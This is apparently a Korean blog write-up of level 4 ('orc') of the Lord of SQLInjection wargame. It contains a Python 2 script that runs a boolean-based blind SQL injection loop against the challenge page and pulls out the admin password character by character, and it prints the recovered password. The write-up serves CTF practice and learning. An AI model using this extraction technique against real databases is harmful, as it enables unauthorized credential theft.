[LOS] Level4: orc

두비니

·

2020. 1. 1. 02:02

 

 

 

 

Lord OSQLInjection: lv.4 orc

 

 

 

 

 

 

 

orc입니다.

 

 

 

pw를 입력받아서 admin의 비밀번호와 같은지 비교해 문제를 푸는 방식의 los네요. 

 

 

이 경우에는 전수조사를 통해 비밀번호를 한글자씩 알아내야하는데, 저는 python코딩을 이용했습니다.(ver.2.7.15기준)

 

 

import httplib

headers = {'Content-Type':'application/x-www-form-urlencoded', 'Cookie':'PHPSESSID=h8vk5n8gafml7kmsgv87809itt'}
conn = httplib.HTTPSConnection('los.rubiya.kr', 443)
pw = ''
for i in range(10):
    for j in range(32, 127):
        conn.request('GET', '/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?pw=%27%20or%20id%20=%20%27admin%27%20and%20ascii(substr(pw,'+str(i)+',1))='+str(j)+'%23','',headers)
        r1 = conn.getresponse().read()
        if "Hello admin" in r1:
            pw += chr(j)
            print pw
            break

 

다음 코드를 이용하면 비밀번호 095a9852가 출력되어 문제를 풀 수 있습니다.

 

 

 

 

 

짜잔

'War Games > Lord of SQLInjection' 카테고리의 다른 글

[LOS] Level6: orge  (0) 2020.01.04
[LOS] Level5: wolfman  (0) 2020.01.03
[LOS] Level3: goblin  (0) 2019.12.31
[LOS] Level2: cobolt  (0) 2019.12.31
[LOS] Level1: gremlin  (0) 2019.12.30